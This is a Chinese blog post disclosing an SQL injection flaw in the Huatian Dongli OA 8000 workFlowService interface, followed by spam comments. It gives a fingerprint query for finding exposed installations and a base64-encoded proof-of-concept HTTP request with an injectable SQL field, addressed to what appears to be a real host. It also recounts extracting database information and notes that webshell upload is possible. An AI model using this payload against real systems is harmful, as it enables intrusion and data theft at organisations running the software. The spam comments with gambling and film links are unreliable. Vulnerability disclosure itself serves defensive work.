漏洞描述

华天动力OA 8000版 workFlowService接口存在SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息

漏洞影响

华天动力OA 8000版

app="华天动力-OA8000"

漏洞poc

UE9TVCAvT0FhcHAvYmZhcHAvYnVmZmFsby93b3JrRmxvd1NlcnZpY2UgSFRUUC8xLjEKSG9zdDogMTIxLjguMTgwLjI6NjY4OApBY2NlcHQtRW5jb2Rpbmc6IGlkZW50aXR5CkNvbnRlbnQtTGVuZ3RoOiAxMzMKQWNjZXB0LUxhbmd1YWdlOiB6aC1DTix6aDtxPTAuOApBY2NlcHQ6ICovKgpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKQpBY2NlcHQtQ2hhcnNldDogR0JLLHV0Zi04O3E9MC43LCo7cT0wLjMKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKCjxidWZmYWxvLWNhbGw+IAo8bWV0aG9kPmdldERhdGFMaXN0Rm9yVHJlZTwvbWV0aG9kPiAKPHN0cmluZz4Kc2VsZWN0ICcxJyB3aGVyZSAxPTEgYW5kIDxFbmNvZGU+I2luamVjdCM8L0VuY29kZT48L3N0cmluZz4gCjwvYnVmZmFsby1jYWxsPg==

复现过程

注意看，这是一个oa系统！
2023-12-04T14:41:33.png

上bp！获取到数据库信息
2023-12-04T14:44:28.png

上sql注入超级工具，可以获取到数据库权限，也能直接传木马，但是违法，咱们点到为止！撤！
2023-12-04T16:54:49.png

已有 12 条评论

wicgxtrahe 访客

2024-10-01 21:40 回复

看的我热血沸腾啊https://www.237fa.com/
Windows 10 / Google Chrome
1. 1 访客
  
  @wicgxtrahe 2024-10-15 17:07 回复
  
  1
  Windows 10 / Google Chrome
2. 1 访客
  
  @wicgxtrahe 2024-10-15 17:07 回复
  
  1
  Windows 10 / Google Chrome
sidfdgbxvl 访客

2024-10-04 22:20 回复

看的我热血沸腾啊https://www.ea55.com/
Windows 10 / Google Chrome
1. 1 访客
  
  @sidfdgbxvl 2024-10-15 17:01 回复
  
  1
  Windows 10 / Google Chrome
  1. 1 访客
    
    @1 2024-10-15 17:12 回复
    
    1
    Windows 10 / Google Chrome
1 访客

2024-10-15 17:00 回复

1
Windows 10 / Google Chrome
1 访客

2024-10-15 17:00 回复

1
Windows 10 / Google Chrome
rlhsmuauau 访客

2024-10-19 17:41 回复

兄弟写的非常好 https://www.cscnn.com/
Windows 10 / Google Chrome
iaamedonzu 访客

2024-11-16 20:49 回复

《龙少爷粤语》喜剧片高清在线免费观看：https://www.jgz518.com/xingkong/17881.html
Windows 10 / Google Chrome
xgnqcnzejo 访客

2024-12-06 01:54 回复

《女人就是女人2019》剧情片高清在线免费观看：https://www.jgz518.com/xingkong/116795.html
Windows 10 / Google Chrome
xfiokurpon 访客

2025-03-01 13:02 回复

隐喻层次丰富，留给读者想象空间。
Windows 10 / Google Chrome